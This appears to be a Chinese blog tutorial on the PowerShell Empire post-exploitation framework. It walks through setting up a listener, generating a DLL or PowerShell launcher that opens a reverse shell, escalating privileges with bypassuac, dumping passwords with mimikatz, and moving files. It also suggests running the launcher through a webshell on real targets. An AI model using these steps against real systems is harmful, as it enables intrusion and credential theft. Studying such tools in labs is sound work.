导语:在你心目中并肩Metasploit的神器有谁?
0x01奇怪的开始
我趁手机不注意,把它自由落体了,好在屏幕没裂开,只不过是断触了,要不对于已经穷疯了的我无疑又是一笔经济负担。好在手机还在保修期内,可以送过去修,但是我去的时间点不对。售后说要下班了,手机要明天才能修,我也没多说什么,手机留下就回来了。晚上,蹲厕所,叼着烟对着手纸发呆,心想:“我擦,我484傻,明天还要去拿了,我干嘛不明天再去修?”
翻着各大论坛,看到了Empire的关键字,没看明白他到底在干嘛。但是早听大佬说过他们用Empire的光辉事迹,趁手机不再,研究下此神器
0x02 Empire简介
一说内网,我们基本都是在第一时间想到Metasploit,因为有Metasploit这么强大的存在我们很少能注意到别的工具。Metasploit的牛逼之处在于他不管是信息收集,渗透,后渗透,木马,社工,你能想到的他基本都可以做到,杀人越货必备啊。但是Empire就是针对内网渗透,针对Powershell,我们在内网渗透中肯能用到的powershell脚本,全部都在Empire的框架中了,更是域渗透神器!但是关于Empire的资料,国内真的是少的可怜,就那么几篇。做安全,不得不佩服国外的大牛们!
0x03 Empire基本用法
下载什么的我就不废话了,github上克隆回来运行install.sh就好
Github:https://github.com/EmpireProject/Empire
不喜欢用命令的同学可以去安装一个GUI界面的,也是国外大牛用php写的一个web界面
Github:https://github.com/interference-security/empire-web
大家自行安装吧~~
先来看看Empire的界面是什么样子的,看起来跟Metasploit感觉是一样的~ 高大上
我们可以很清楚的看到有180个模块,0个监听,0个代理
Agents用谷歌翻译出来是代理的意思,我们把它理解成会话就行跟Metasploit一样session。
我们首先要创建一个监听,就跟Metaploit创建一个监听载荷一个意思
在命令行里输入Listener就可以进入监听
Options / info 查看需要设置的选项info也是可以的,
我们只需要设置简单的Host就可以了,当然如果想修改名字的话也可以
Set host http://你的ip:端口 设置Host Set name smiletest 设置当前监听的名字 Execute 执行 run也可以
我们设置好了之后需要生成一个可以反弹的shellcode
Empire可以生成14种类型的木马
我们选择dll(是不是有人又想到NSA的漏洞了- -,当然也可以,自由发挥吧)
Usestager dll
我们可以设置Listener,然后执行execute生成dll木马
会生成在/tmp/launcher.dll中了
Set Listener smiltest Execute
我们也可以不生成dll文件
Back Launcher smiltest
直接生成powershell命令,当执行这命令的时候会给我们回弹一个shell
直接拖到虚拟机里去执行,真正的渗透环境中,直接在webshell里执行就好,但前提是目标机器必须有powershell
当我们执行后,命令行窗口一闪而过,接不到图,但是在我本机下已经反弹了一个会话,可以查看我们的会话列表
agents
如果想选择进入会话,在终端输入
interact EZUGW142B4KDFBVS
这个名字是Empire给我们生成的名字,看着这个名字感觉太长了,以后用起来感觉麻烦,我们可以修改这个名字
rename 原来的名字 修改的名字
进入终端后输入help看看我们可以做什么
可以看到很多的命令,一点都不比Metasploit弱
在这里输入的命令如果不是这里面的命令的话,我们的命令会被解析为windows命令执行,并给回显。但是这里要注意了,你每写完一道命令敲下回车以后,不要感觉是没有回显,要稍等一下才会回显出来
比如说,我写一道ipconfig命令,并不再这个列表中,那么我们会在靶机执行这道命令,如图:
再来看看他的命令
Agents 和 back 这两个命令在我们现在的情况来看是差不多的
Back 是返回上级,而我们的上级是agents,当写agents的时候,也会回到agents文件
Bypassuac 是提权神级命令,敲完命令就提权
这里返回了一个新的绘画,区别就是在USERBANE前加了星号
有了这个*就代表已经提权成功了,我们先用没有星号的执行mimikatz
它会给出如下提示
用有星号的试一试
已经读取成功了,Empire有个很方便的地方,就是,我们不需要在mimikatz的回显中去寻找密码,他已经帮我们列举好了,我们只需要执行creds命令,密码就出来了。
从这里便可窃取身份令牌
不过当然也有bypassuac不能直接提权的情况了,我们后续再说
Sc命令 截图一张
Download 下载文件
用法:download [path]
Upload 当然就是上传咯
用法:upload 文件 靶机路径
Usemoudle 使用模块,这才是最有用的地方。先来个恶作剧把,在靶机上弹窗,提示 “I am hacker”
usemodule trollsploit/message
靶机上的提示
这就完成了一次恶作剧
0x04 躺在床上的总结
大致学习了一下,感受到了Empire的强大之处,丝毫不弱与Metasploit他就是针对powershell的内网渗透工具,虽然没有Metasploit那么强大的各种平台都能打,但是单单针对windows,以及域渗透的强大之处是Metasploit不能比的。而且他还跟Metasploit一样,有强大的接口,以便于我们写我们自己的payload。绝对是一款不可多得的神兵利器!
想更深入了解Empire,请期待我的下一篇文章–《Empire域渗透实战》